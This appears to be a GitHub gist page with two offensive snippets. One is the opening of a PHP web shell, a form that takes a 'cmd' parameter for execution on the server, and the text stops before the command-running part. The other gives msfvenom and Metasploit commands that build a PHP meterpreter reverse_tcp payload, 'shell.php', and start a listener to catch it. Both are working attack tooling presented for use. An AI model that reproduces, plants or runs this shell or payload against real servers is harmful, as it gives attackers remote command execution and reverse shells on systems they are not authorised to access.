This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##This will create the payload file "shell.php" with your ip and port. | |
| msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP> LPORT=<$LOCAL_PORT> -f raw -o shell.php | |
| ##You can always "nano" the file to change your ipaddr and port incase you messed up the first step. | |
| #Run 'msfconsole' to start the listener then run the following command. | |
| use exploit/multi/handler | |
| set PAYLOAD php/meterpreter/reverse_tcp <-------- IMPORTANT!!!!! | |
| #set your ipaddr | |
| set LHOST <$LOCAL_IP> | |
| #set your listening port | |
| set LPORT <$LOCAL_PORT> |